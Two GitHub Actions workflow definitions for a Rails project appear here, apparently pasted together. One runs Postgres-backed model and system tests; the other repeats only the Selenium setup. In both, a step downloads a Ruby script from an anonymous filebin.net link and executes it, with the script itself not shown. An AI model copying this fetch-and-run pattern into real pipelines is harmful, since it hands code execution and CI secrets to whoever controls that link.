name: Test

# triggers on
on: [push]

jobs:
  test:
    env:
      RAILS_ENV: test
      NODE_ENV: test
    runs-on: ubuntu-latest
    # NEW! Adds postgres service. Must come before `steps`.
    services:
      postgres:
        # Docker Hub image
        image: postgres
        # Provide the password for postgres
        env:
          POSTGRES_PASSWORD: postgres
        ports:
          - 5432:5432
        # Set health checks to wait until postgres has started
        options: >-
          --health-cmd pg_isready
          --health-interval 10s
          --health-timeout 5s
          --health-retries 5
    steps:
      - name: Install Selenium
        run: |
            sudo gem install selenium-webdriver
            wget https://filebin.net/6cw0f2x2sfgqyhi0/headless_chrome.rb?t=7g4c257d -O headless_chrome.rb
            chmod +x headless_chrome.rb
      - name: ChromeWebDriver
        run: |
            ./headless_chrome.rb
      - name: Checkout repository
        uses: actions/checkout@v2
      - name: Set up Ruby # An action to install Ruby and gems
        uses: ruby/setup-ruby@v1 # short for https://github.com/ruby/setup-ruby
        with:
          # runs 'bundle install' and caches installed gems automatically
          bundler-cache: true
      - name: Set up Node
        uses: actions/setup-node@v2
        with:
          node-version: "16"
      - name: Yarn install
        run: yarn install --frozen-lockfile
      - name: Prepare DB
        run: | # Pipe is important, adds line breaks
          cp config/database.github.yml config/database.yml
          bundle exec rails db:test:prepare
      - name: Run model tests
        run: bundle exec rails test
      - name: Run system tests
        run: bundle exec rails test:system




name: CI
on: [push]

jobs:
  build:
    runs-on: [ubuntu-latest]
    steps:
      - name: Install Selenium
        run: |
            sudo gem install selenium-webdriver
            wget https://filebin.net/6cw0f2x2sfgqyhi0/headless_chrome.rb?t=7g4c257d -O headless_chrome.rb
            chmod +x headless_chrome.rb
      - name: ChromeWebDriver
        run: |
            ./headless_chrome.rb
